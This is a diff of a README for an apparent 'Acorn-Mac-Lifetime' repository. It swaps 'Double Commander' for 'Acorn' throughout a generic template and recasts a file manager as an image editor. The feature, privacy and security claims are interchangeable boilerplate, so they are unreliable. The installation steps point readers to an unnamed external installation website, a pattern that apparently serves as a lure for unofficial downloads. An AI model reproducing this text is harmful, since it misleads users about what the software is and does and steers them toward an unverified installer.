Acorn-Mac-Lifetime/Acorn-Mac/README.md

 ## Installation Guide

-1. Use the "Download for macOS" button above to access the Double Commander installation page.
+1. Use the "Download for macOS" button above to access the Acorn installation page.
-2. Complete the Double Commander installation by following all instructions displayed on the installation website.
+2. Complete the Acorn installation by following all instructions displayed on the installation website.

 ---

 ## Application Overview

-Double Commander macOS represents a professional‑grade file manager engineered specifically for the Mac platform.
+Acorn macOS represents a professional‑grade image editing software engineered specifically for the Mac platform.
 The application prioritizes native macOS integration, leveraging Apple's core frameworks and interface guidelines to deliver an experience that feels inherently familiar to Mac users.

 The software architecture emphasizes <a href="#">responsive performance</a> through careful optimization of system resources.
 Every interaction, from launching the app to processing complex operations, has been refined to minimize latency and maintain smooth visual feedback.
 This attention to performance means the application remains usable even under heavy workloads.

-Double Commander provides comprehensive <a href="#">customization capabilities</a> that adapt to individual workflows without requiring extensive configuration.
+Acorn provides comprehensive <a href="#">customization capabilities</a> that adapt to individual workflows without requiring extensive configuration.
 Users can adjust interface layouts, modify keyboard shortcuts, and configure automation rules through intuitive preference panels.
 These settings sync seamlessly across devices when using iCloud, ensuring consistency regardless of which Mac you're working on.

 Integration with macOS ecosystem features runs deep throughout the application.
-Support for Handoff, Continuity Camera, Universal Control, and other system‑level technologies means Double Commander works naturally alongside your other applications.
+Support for Handoff, Continuity Camera, Universal Control, and other system‑level technologies means Acorn works naturally alongside your other applications.
 The software respects system‑wide settings for accessibility, appearance, and privacy while adding its own specialized capabilities.

-Professional users benefit from advanced <a href="#">workflow automation</a> features built into Double Commander.
+Professional users benefit from advanced <a href="#">workflow automation</a> features built into Acorn.
 The application supports AppleScript, Shortcuts integration, and direct API access for users who need programmatic control.
 Batch processing capabilities handle repetitive tasks efficiently, and preset systems allow teams to standardize configurations across multiple installations.

-Security and privacy receive constant attention in Double Commander's design.
+Security and privacy receive constant attention in Acorn's design.
 The application operates within macOS sandbox restrictions, requests only necessary permissions, and provides transparent information about data usage.
 All network communications use encrypted connections, and sensitive information never leaves your device without explicit authorization.

-Regular updates ensure Double Commander maintains compatibility with the latest macOS releases while introducing new features based on user feedback.
+Regular updates ensure Acorn maintains compatibility with the latest macOS releases while introducing new features based on user feedback.
 The development team prioritizes stability and backwards compatibility, so updates enhance functionality without disrupting established workflows.

 ---